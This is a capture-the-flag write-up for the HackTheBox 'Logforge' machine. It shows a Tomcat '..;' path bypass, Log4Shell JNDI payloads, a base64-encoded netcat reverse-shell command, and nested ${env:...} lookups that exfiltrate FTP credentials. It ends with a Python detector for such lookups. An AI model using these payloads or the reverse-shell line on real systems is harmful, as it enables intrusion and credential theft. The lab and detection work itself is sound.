HTB Logforge (Medium) - Writeup
Difficulty: Medium
Discovered a Tomcat server with a /manager panel, accessed via a 403 bypass using a path traversal trick.
Identified and exploited Log4Shell by injecting a JNDI payload in a logged parameter, leading to RCE.
Gained a reverse shell using a serialized CommonsCollections gadget via JNDI Exploit Kit.
Escalated to root by exfiltrating environment variables through Log4j to retrieve FTP credentials, then SSH’ed in with a leaked private key.
Nmap
The nmap scan revealed two open and two filtered ports:
Port 80 - Website
The website consists solely of a static image, with no interactive or visible functionality.
Running Feroxbuster revealed the /admin directory, which returns a 403 Forbidden error.
It also revealed that the site runs Tomcat, given directories like /manager.
We can check the headers with curl:
curl -I http://10.10.11.138/
The response sets a Java session cookie, which indicates that the backend is written in Java.
Tomcat is also written in Java, so that is another hint.
We can re-run feroxbuster with additional extensions and a different wordlist:
feroxbuster --url http://10.10.11.138/ -x js,jsp,java,xml -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
It found index.jsp but nothing more of interest.
403 bypass trick
Visiting /manager returns a 403 access denied.
There is a presentation by Orange Tsai that is a must-read if you have not gone through it already:
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
I’ll paste the part about Tomcat here:
The ..; sequence bypasses Tomcat’s path parsing and normalization logic: the access check sees the literal /x/..;/manager, while Tomcat strips the ;-delimited path parameter and normalizes the .. away, so it ends up serving /manager.
We can now access:
http://<ip>/x/..;/manager
Luckily for us, the default credentials worked:
- tomcat:tomcat
Log4Shell - exploitation
Given the name of the box, there might be a Log4Shell vulnerability.
There is an application listed: /UHC{BadWayToBlockTomcat}
We can click on expire and capture the request with Burp Suite:
There is only one parameter, idle, so we can try a basic Log4Shell payload to test whether that is the case here.
For it to work, the payload must go into a field that is logged by the Log4j library.
idle=${jndi:ldap://10.10.14.5/x}
Then start tcpdump to watch for the callback:
It works; now we want to get shell access.
I had many problems with getting this shell.
First I tried to run a python server and the marshalsec-jar ldap server, but it couldn’t redirect to my python server.
Then I tried creating a .ser payload with ysoserial and running JNDI-Exploit-Kit, but it didn’t work either.
Finally, the thing that worked was creating a payload directly in JNDI-Exploit-Kit.
To exploit this we need JNDI-Exploit-Kit:
git clone https://github.com/pimps/JNDI-Exploit-Kit.git
mvn clean package -DskipTests
cd target
Then run it:
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
Now request a special path that makes the kit build the payload and serve it:
${jndi:ldap://10.10.14.5:1389/serial/CommonsCollections5/exec_unix/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pICAyPiYxfG5jIDEwLjEwLjE0LjUgIDkwMDUgPi90bXAvZg==}
Most of the payloads failed, but the one that succeeded used this command:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9005 >/tmp/f
In the final payload the command had to be base64-encoded:
The request then reaches our server:
And finally we get shell access:
Priv Esc
First we can grab the flag:
There is a file ftpServer-1.0-SNAPSHOT-all.jar; we can transfer it with netcat:
Attacker:
nc -nvlp 80 > ftpServer-1.0-SNAPSHOT-all.jar
Target:
nc -w 3 10.10.14.5 80 < ftpServer-1.0-SNAPSHOT-all.jar
To decompile the Java classes we can use JD-GUI:
Looking through the code, we found the credentials being read from two environment variables:
The username parameter is passed through the Log4j library:
That means we can connect to the FTP server and put a JNDI payload in the username, like we did on the website, to get shell access.
For it to work we need to start the JNDI-Exploit-Kit server as before.
Then log into FTP on the target machine twice, using the following payloads as the username:
${jndi:ldap://10.10.14.5:1389/${env:ftp_user}}
${jndi:ldap://10.10.14.5:1389/${env:ftp_password}}
Then the second payload:
Now we can look at what arrived at our server:
It successfully exfiltrated the credentials:
- ippsec:log4j_env_leakage
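Both injection points in this writeup (the logged idle parameter and the FTP username) use the same Log4j lookup syntax, and the FTP one nests an ${env:...} lookup inside the JNDI body so that the resolved value travels to the attacker’s LDAP server. The detector below is an added example, not code from the writeup or from the box: it parses nested ${prefix:body} lookups in a log or request line, extracts the JNDI callback host, and reports any lookup nested inside a JNDI body as leaked data, run over constructed sample lines modelled on the two payloads above.

```python
import re

RISKY_PREFIXES = {"jndi", "env", "sys"}  # lookups that resolve data from outside the message
CALLBACK_RE = re.compile(r"^(ldaps?|rmi|dns)://([^/:?]+)", re.IGNORECASE)


def extract_lookups(text: str) -> list:
    """Return every ${prefix:body} lookup in text as (prefix, body), outer before inner."""
    found, pos = [], 0
    while (start := text.find("${", pos)) != -1:
        depth, end = 0, start
        while end < len(text):  # walk to the brace that closes this lookup
            if text.startswith("${", end):
                depth, end = depth + 1, end + 2
            elif text[end] == "}" and (depth := depth - 1) == 0:
                break
            else:
                end += 1
        else:
            break  # unterminated lookup: nothing more to parse
        prefix, _, body = text[start + 2:end].partition(":")
        found.append((prefix.lower(), body))
        found.extend(extract_lookups(body))  # nested lookups such as ${env:...}
        pos = end + 1
    return found


def scan_line(line: str) -> dict:
    """Report lookups, JNDI callback hosts and lookups that a JNDI body would leak."""
    lookups = extract_lookups(line)
    hosts, leaked = [], []
    for prefix, body in lookups:
        if prefix != "jndi":
            continue
        if m := CALLBACK_RE.match(body):
            hosts.append(m.group(2))
        # anything nested inside a JNDI body is resolved, then sent to that host
        leaked.extend(f"{p}:{b}" for p, b in extract_lookups(body))
    return {"suspicious": any(p in RISKY_PREFIXES for p, _ in lookups),
            "lookups": lookups, "callback_hosts": hosts, "leaked_lookups": leaked}


# Constructed sample lines modelled on the two injection points in the writeup.
SAMPLE_LINES = [
    "POST /expire idle=${jndi:ldap://10.10.14.5/x}",
    "FTP USER ${jndi:ldap://10.10.14.5:1389/${env:ftp_user}}",
    "FTP USER alice",
    "POST /expire idle=${date:yyyy-MM-dd}",  # benign built-in lookup, not flagged
]
```

Calling scan_line on each SAMPLE_LINES entry flags the first two, reports 10.10.14.5 as the callback host, and lists env:ftp_user as the leaked lookup for the FTP line.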
With these credentials we can log into FTP on the target:
FTP runs as root and we land in root’s home directory.
The easiest way to obtain a root shell is to exfiltrate root’s SSH private key.
Now we copy it over to Kali:
There is also a flag there:
Thank you for reading!!